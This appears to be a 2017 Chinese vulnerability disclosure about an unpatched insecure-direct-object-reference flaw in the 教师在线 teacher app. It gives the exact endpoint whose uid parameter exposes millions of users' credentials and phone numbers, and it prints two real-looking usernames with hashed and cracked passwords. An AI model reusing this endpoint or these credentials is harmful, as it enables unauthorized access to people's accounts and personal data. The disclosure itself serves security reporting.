教师在线泄露大量敏感数据-华图教育旗下教师在线APP

潜在风险
可泄露大量数据
漏洞处理状态
暂无修复
漏洞详情
披露状态：
2017-11-7 3:00:00 漏洞细节对公众公开
2017-9-23 3:00:00 漏洞细节对牛犊公开
2017-8-24 3:00:00 漏洞细节对牛人公开
2017-8-4 3:00:00 漏洞细节对神牛和大牛公开
2017-7-25 3:00:00 漏洞细节对第三方安全公司公开
漏洞证明(POC)：
注册个账户进入到app，抓包可发现一个url
http://mobileapp.hteacher.net/teacher/index.php/member/get_userInfo?uid=1
然后在浏览器上查看

可以查看363万用户的账户名、密码、IP登陆地、省份、手机号等信息（密码可解密）
http://mobileapp.hteacher.net/teacher/index.php/member/get_userInfo?uid=3630000

密码能随意解密：
用户名：jszx_app407333643     passwd：edcfa7411cf3a03f   解密后：zf8790

             jszx_qq923216261    49ba59abbe56e057   123456
验证数据真实性，主站登陆

利用代码(EXP)：



修复方案：
(暂无内容)